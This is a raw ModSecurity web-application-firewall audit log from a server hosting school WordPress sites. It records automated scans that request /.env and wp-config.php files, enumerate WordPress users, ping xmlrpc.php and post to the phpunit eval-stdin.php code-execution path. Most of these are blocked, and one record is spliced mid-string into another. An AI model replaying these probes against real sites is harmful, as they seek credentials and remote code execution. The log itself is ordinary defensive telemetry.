Apache-HttpClient/4.5.13 (Java/11.0.26) --a8ac1b5c-C-- demo.sayHello --a8ac1b5c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8ac1b5c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746437658341829 6575 (- - -) Stopwatch2: 1746437658341829 6575; combined=4733, p1=674, p2=3779, p3=32, p4=36, p5=123, sr=128, sw=89, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8ac1b5c-Z-- --40670f41-A-- [05/May/2025:16:41:33 +0700] aBiHzU2V_h1VFAgsfgZG8QAAAAE 103.236.140.4 57326 103.236.140.4 8181 --40670f41-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --40670f41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40670f41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746438093088341 2458 (- - -) Stopwatch2: 1746438093088341 2458; combined=1079, p1=361, p2=682, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40670f41-Z-- --ebeb0076-A-- [05/May/2025:16:41:35 +0700] aBiHzwRwKNFSM6B7_LZ4eQAAAIM 103.236.140.4 57330 103.236.140.4 8181 --ebeb0076-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.84 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ebeb0076-C-- demo.sayHello --ebeb0076-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebeb0076-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746438095932332 6019 (- - -) Stopwatch2: 1746438095932332 6019; combined=4322, p1=589, p2=3500, p3=35, p4=35, p5=96, sr=117, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebeb0076-Z-- --f8d6045a-A-- [05/May/2025:17:11:54 +0700] aBiO6k2V_h1VFAgsfgZH8gAAABg 103.236.140.4 59044 103.236.140.4 8181 --f8d6045a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 146.190.240.206 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 146.190.240.206 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --f8d6045a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8d6045a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746439914271182 747 (- - -) Stopwatch2: 1746439914271182 747; combined=358, p1=323, p2=0, p3=0, p4=0, p5=35, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8d6045a-Z-- --af4ef63a-A-- [05/May/2025:18:11:07 +0700] aBicy02V_h1VFAgsfgZLwwAAAAc 103.236.140.4 47038 103.236.140.4 8181 --af4ef63a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --af4ef63a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af4ef63a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746443467863779 9607 (- - -) Stopwatch2: 1746443467863779 9607; combined=6423, p1=1729, p2=4639, p3=0, p4=0, p5=55, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af4ef63a-Z-- --dce8fb12-A-- [05/May/2025:18:11:10 +0700] aBiczgRwKNFSM6B7_LZ8DQAAAIQ 103.236.140.4 47058 103.236.140.4 8181 --dce8fb12-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.178 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dce8fb12-C-- demo.sayHello --dce8fb12-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dce8fb12-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746443470707536 6119 (- - -) Stopwatch2: 1746443470707536 6119; combined=4739, p1=595, p2=3832, p3=38, p4=44, p5=163, sr=116, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dce8fb12-Z-- --bd2f7e67-A-- [05/May/2025:18:11:38 +0700] aBic6k2V_h1VFAgsfgZL4AAAAAI 103.236.140.4 47378 103.236.140.4 8181 --bd2f7e67-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bd2f7e67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd2f7e67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746443498077236 2731 (- - -) Stopwatch2: 1746443498077236 2731; combined=1263, p1=416, p2=818, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd2f7e67-Z-- --982f2418-A-- [05/May/2025:18:11:40 +0700] aBic7IZWvR7-42f6JrDg2QAAAMw 103.236.140.4 47410 103.236.140.4 8181 --982f2418-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.189 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --982f2418-C-- demo.sayHello --982f2418-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --982f2418-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746443500813029 6519 (- - -) Stopwatch2: 1746443500813029 6519; combined=4759, p1=660, p2=3857, p3=32, p4=37, p5=101, sr=131, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --982f2418-Z-- --f6e9be35-A-- [05/May/2025:18:16:14 +0700] aBid_oZWvR7-42f6JrDhhwAAAM4 103.236.140.4 50194 103.236.140.4 8181 --f6e9be35-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f6e9be35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6e9be35-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746443774824930 2623 (- - -) Stopwatch2: 1746443774824930 2623; combined=1270, p1=447, p2=791, p3=0, p4=0, p5=31, sr=104, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6e9be35-Z-- --c144315a-A-- [05/May/2025:18:16:17 +0700] aBieAQRwKNFSM6B7_LZ8vwAAAII 103.236.140.4 50218 103.236.140.4 8181 --c144315a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.92 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c144315a-C-- demo.sayHello --c144315a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c144315a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746443777596113 6804 (- - -) Stopwatch2: 1746443777596113 6804; combined=4787, p1=624, p2=3906, p3=46, p4=43, p5=99, sr=76, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c144315a-Z-- --cab3db7e-A-- [05/May/2025:18:19:37 +0700] aBieyYZWvR7-42f6JrDiOQAAAMY 103.236.140.4 52228 103.236.140.4 8181 --cab3db7e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.184 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cab3db7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cab3db7e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746443977879945 3401 (- - -) Stopwatch2: 1746443977879945 3401; combined=1435, p1=496, p2=902, p3=0, p4=0, p5=37, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cab3db7e-Z-- --4549af1a-A-- [05/May/2025:18:19:40 +0700] aBiezPZJDMuQndL03JMwsgAAAEk 103.236.140.4 52268 103.236.140.4 8181 --4549af1a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.184 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4549af1a-C-- demo.sayHello --4549af1a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4549af1a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746443980936569 6157 (- - -) Stopwatch2: 1746443980936569 6157; combined=4506, p1=543, p2=3711, p3=31, p4=36, p5=110, sr=73, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4549af1a-Z-- --10876307-A-- [05/May/2025:19:09:02 +0700] aBiqXk2V_h1VFAgsfgZXBQAAABE 103.236.140.4 51282 103.236.140.4 8181 --10876307-B-- GET /wp-config.php_bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 162.241.224.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 162.241.224.128 X-Forwarded-Proto: http Connection: close Accept: */* --10876307-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10876307-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746446942022642 956 (- - -) Stopwatch2: 1746446942022642 956; combined=368, p1=325, p2=0, p3=0, p4=0, p5=43, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10876307-Z-- --f3636034-A-- [05/May/2025:19:52:10 +0700] aBi0ek2V_h1VFAgsfgZesQAAABA 103.236.140.4 47608 103.236.140.4 8181 --f3636034-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Opera/9.30 (Nintendo Wii; U; ; 2047-7; en) Accept-Charset: utf-8 --f3636034-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3636034-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746449530212766 805 (- - -) Stopwatch2: 1746449530212766 805; combined=325, p1=286, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3636034-Z-- --ce65492f-A-- [05/May/2025:20:42:22 +0700] aBjAPk2V_h1VFAgsfgZmyAAAABg 103.236.140.4 47930 103.236.140.4 8181 --ce65492f-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.146.57.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.146.57.139 X-Forwarded-Proto: https Connection: close Content-Length: 27 User-Agent: python-requests/2.31.0 Accept: */* Content-Type: application/x-www-form-urlencoded --ce65492f-C-- --ce65492f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce65492f-E-- --ce65492f-H-- Message: Access denied with code 403 (phase 2). String match " demo.sayHello --84cea873-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --84cea873-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746455109040685 7828 (- - -) Stopwatch2: 1746455109040685 7828; combined=6155, p1=807, p2=5061, p3=51, p4=70, p5=101, sr=81, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84cea873-Z-- --ce3b9c65-A-- [05/May/2025:22:04:20 +0700] aBjTdE2V_h1VFAgsfgZ0YwAAAAg 103.236.140.4 38252 103.236.140.4 8181 --ce3b9c65-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 188.166.186.245 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force Cookie: X-Forwarded-For: 188.166.186.245 Accept-Encoding: gzip X-Varnish: 142943768 --ce3b9c65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ce3b9c65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746457460846251 720 (- - -) Stopwatch2: 1746457460846251 720; combined=269, p1=238, p2=0, p3=0, p4=0, p5=31, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce3b9c65-Z-- --f2a67355-A-- [05/May/2025:22:04:42 +0700] aBjTivZJDMuQndL03JNPngAAAEo 103.236.140.4 38482 103.236.140.4 8181 --f2a67355-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f2a67355-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2a67355-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746457482745171 2235 (- - -) Stopwatch2: 1746457482745171 2235; combined=1051, p1=359, p2=666, p3=0, p4=0, p5=25, sr=60, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2a67355-Z-- --0b151d64-A-- [05/May/2025:22:04:45 +0700] aBjTjU2V_h1VFAgsfgZ0hgAAABg 103.236.140.4 38508 103.236.140.4 8181 --0b151d64-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.148 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0b151d64-C-- demo.sayHello --0b151d64-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b151d64-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file 